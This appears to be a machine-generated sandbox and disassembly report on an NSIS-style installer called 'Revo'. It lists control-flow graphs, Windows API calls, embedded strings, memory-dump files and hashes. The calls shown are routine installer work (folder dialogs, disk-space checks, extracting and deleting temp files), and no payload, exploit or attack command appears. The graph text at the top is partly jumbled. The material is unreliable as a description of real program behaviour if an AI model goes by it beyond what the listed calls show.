                                                                                                                                              control_flow_graph 381 404b12-404b3c 382 404b3e-404b4a call 405ce6 call 406950 381->382 383 404b4f-404b59 381->383 382->383 385 404bc7-404bce 383->385 386 404b5b-404b71 GetDlgItem call 405fe8 383->386 389 404bd4-404bdd 385->389 390 404ca5-404cac 385->390 397 404b83-404bbc SetWindowTextW call 404621 * 2 call 404656 call 406a96 386->397 398 404b73-404b7b call 40601c 386->398 393 404bf7-404bfc 389->393 394 404bdf-404bea 389->394 395 404cbb-404cd6 call 405ce6 call 406079 390->395 396 404cae-404cb5 390->396 393->390 401 404c02-404c44 call 4066df SHBrowseForFolderW 393->401 399 404bf0 394->399 400 404e53-404e65 call 404688 394->400 419 404cd8 395->419 420 404cdf-404cf7 call 4066a2 call 406a96 395->420 396->395 396->400 397->400 439 404bc2-404bc5 SHAutoComplete 397->439 398->397 417 404b7d-404b7e call 405f71 398->417 399->393 413 404c46-404c60 CoTaskMemFree call 405f71 401->413 414 404c9e 401->414 426 404c62-404c68 413->426 427 404c8a-404c9c SetDlgItemTextW 413->427 414->390 417->397 419->420 437 404d33-404d44 call 4066a2 call 40601c 420->437 438 404cf9-404cff 420->438 426->427 430 404c6a-404c81 call 4066df lstrcmpiW 426->430 427->390 430->427 441 404c83-404c85 lstrcatW 430->441 444 404d15-404d17 442->444 445 404d8b-404da5 442->445 448 404d19 444->448 449 404d1c-404d31 call 405fbd 444->449 447 404da7 445->447 451 404dac-404db6 call 404faf 447->451 448->449 449->437 449->442 459 404dd1-404dda 451->459 460 404db8-404dbf 451->460 453->454 454->447 457 404d64-404d89 MulDiv 454->457 457->451 461 404e0c-404e16 459->461 462 404ddc-404dec call 404f97 459->462 460->459 463 404dc1 460->463 465 404e22-404e28 461->465 466 404e18-404e1f call 40140b 461->466 473 404dfe-404e07 SetDlgItemTextW 462->473 474 404dee-404df7 call 404ece 462->474 467 404dc3-404dc8 463->467 468 404dca 463->468 471 404e2a 465->471 472 404e2d-404e3e call 404643 465->472 466->465 467->459 467->468 468->459 471->472 479 404e40-404e46 472->479 480 404e4d 472->480 473->461 481 404dfc 474->481 479->480 482 404e48 call 404a6b 479->482 480->400 481->461 482->480 437->453 437->454 438->437 438->442 439->385 441->427 442 404d01-404d13 GetDiskFreeSpaceExW 453 404d46 454 404d49-404d62 GetDiskFreeSpaceW
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404B61
• SetWindowTextW.USER32(00000000,?), ref: 00404B8B
• SHAutoComplete.SHLWAPI(00000000,00000001,00000009,00000000,?,00000014,?,?,00000001,?), ref: 00404BC5
• SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
• CoTaskMemFree.OLE32(00000000), ref: 00404C47
• lstrcmpiW.KERNEL32(Remove folder: ,00442748,00000000,?,?), ref: 00404C79
• lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404C85
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
  • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
  • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
  • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
  • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
  • Part of subcall function 00406950: CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
• GetDiskFreeSpaceExW.KERNEL32(C:\Program Files\,?,?,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D0E
• GetDiskFreeSpaceW.KERNEL32(C:\Program Files\,?,?,0000040F,?,C:\Program Files\,C:\Program Files\,?,00000001,C:\Program Files\,?,?,000003FB,?), ref: 00404D5A
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
  • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
  • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
  • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A$C:\Program Files\$H'D$Remove folder:
• API String ID: 4039761011-425954661

Control-flow Graph

• Executed
• Not Executed
APIs
• DeleteFileW.KERNEL32(?,?,76F93420,76F92EE0,004BD000), ref: 00405DD7
• lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E1F
• lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E42
• lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E48
• FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,76F93420,76F92EE0,004BD000), ref: 00405E58
• FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
• FindClose.KERNEL32(00000000), ref: 00405F07
Strings
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: P'E$\*.*
• API String ID: 2035342205-897026672
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileW.KERNEL32(76F93420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0), ref: 00406A0A
• FindClose.KERNEL32(00000000), ref: 00406A16
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
Similarity
• API ID: CreateInstance
• String ID:
• API String ID: 542301482-0
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                              • Opcode ID: ac6a53922a97e284df946da7801549c61c6641663f6eec0e2d2377e42d6a165f
                                                                                                                                              • Instruction ID: efe4a8e86551b5277c252534069081f49e8237aa630b9309e96070f066c2822a
                                                                                                                                              • Opcode Fuzzy Hash: ac6a53922a97e284df946da7801549c61c6641663f6eec0e2d2377e42d6a165f
                                                                                                                                              • Instruction Fuzzy Hash: A8F08271A04105EADB00EBE5D9599AEB378EF14314F20017BE111F31E5D7B88E509B29

Control-flow Graph
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
• ShowWindow.USER32(?), ref: 0040417E
• GetWindowLongW.USER32(?,000000F0), ref: 00404190
• ShowWindow.USER32(?,00000004), ref: 004041A9
• DestroyWindow.USER32 ref: 004041BD
• SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
• GetDlgItem.USER32(?,?), ref: 004041F5
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
• IsWindowEnabled.USER32(00000000), ref: 00404210
• GetDlgItem.USER32(?,00000001), ref: 004042BB
• GetDlgItem.USER32(?,00000002), ref: 004042C5
• SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
• GetDlgItem.USER32(?,00000003), ref: 004043D6
• ShowWindow.USER32(00000000,?), ref: 004043F7
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404409
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404424
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
• EnableMenuItem.USER32(00000000), ref: 00404441
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
• lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
• SetWindowTextW.USER32(?,00442748), ref: 004044AA
• ShowWindow.USER32(?,0000000A), ref: 004045DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Window$Item$MessageSendShow$Long$CallbackDispatcherMenuUser$ClassDestroyEnableEnabledSystemTextlstrlen
• String ID: H'D
• API String ID: 3964124867-716976774
• Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
• Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
• Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
• Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E

Control-flow Graph
APIs
  • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
  • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
• lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
• lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420), ref: 00403E75
• lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
• GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403E93
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
• RegisterClassW.USER32(00464200), ref: 00403F19
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
• ShowWindow.USER32(00000005,00000000), ref: 00403F9C
• GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
• GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
• RegisterClassW.USER32(00464200), ref: 00403FDE
• DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-2601196950
• Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
• Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

Control-flow Graph
APIs
• GetTickCount.KERNEL32 ref: 00403109
• GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
• GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
• GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
Strings
• Inst, xrefs: 004031DA
• Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
• soft, xrefs: 004031E3
• hA, xrefs: 004032B6
• Error launching installer, xrefs: 00403145
• Null, xrefs: 004031EC
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd

Control-flow Graph
• Control-flow graph of the function at 004066DF (graph image not reproduced)
APIs
• GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 00406801
• GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406817
• SHGetPathFromIDListW.SHELL32(00000000,Remove folder: ), ref: 00406875
• CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
• lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
• lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406903
Strings

Control-flow Graph
• Control-flow graph of the function at 00405727 (graph image not reproduced)
APIs
• lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
• lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
• lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
• SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
Strings

Control-flow Graph
• Control-flow graph of the function at 00401794 (graph image not reproduced)
APIs
• lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017D5
• CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\PACK.EXE,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017FA
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
  • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
Strings

Control-flow Graph
• (rendered graph not preserved) entry 00402711; basic blocks span 00402711-00402C5E; the blocks call 00402DA9, 00406602, ReadFile, 00406215, 00406273, MultiByteToWideChar, 004065E9 and SetFilePointer
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
  • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
• Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
• Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
• Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58

Control-flow Graph
• (rendered graph not preserved) entry 00403053; basic blocks span 00403053-004030F4; the blocks call DestroyWindow, 00406AD2, GetTickCount, 00403037, wsprintfW, 00405727, CreateDialogParamW and ShowWindow
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 0040306E
• GetTickCount.KERNEL32 ref: 0040308C
• wsprintfW.USER32 ref: 004030BA
  • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
  • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
  • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
  • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
  • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
  • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
• CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
• ShowWindow.USER32(00000000,00000005), ref: 004030EC
  • Part of subcall function 00403037: MulDiv.KERNEL32(00003F10,00000064,00006606), ref: 0040304C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
• Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
• Opcode Fuzzy Hash: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
• Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF

Control-flow Graph
• (rendered graph not preserved) entry 00402FB8; basic blocks span 00402FB8-00403034; the blocks call SetTimer, 00403037, wsprintfW, SetWindowTextW and SetDlgItemTextW
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
• wsprintfW.USER32 ref: 0040300A
• SetWindowTextW.USER32(?,?), ref: 0040301A
• SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
• Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
• Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
• Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
• Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99

Control-flow Graph
• (rendered graph not preserved) entry 00402975; basic blocks span 00402975-00402A7A; the blocks call 00402DCB, 00405FE8, 0040616D, 00406192, GlobalAlloc, 0040361D, 00403607, 00403396, 0040614D, GlobalFree, 00406244, CloseHandle and DeleteFileW
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
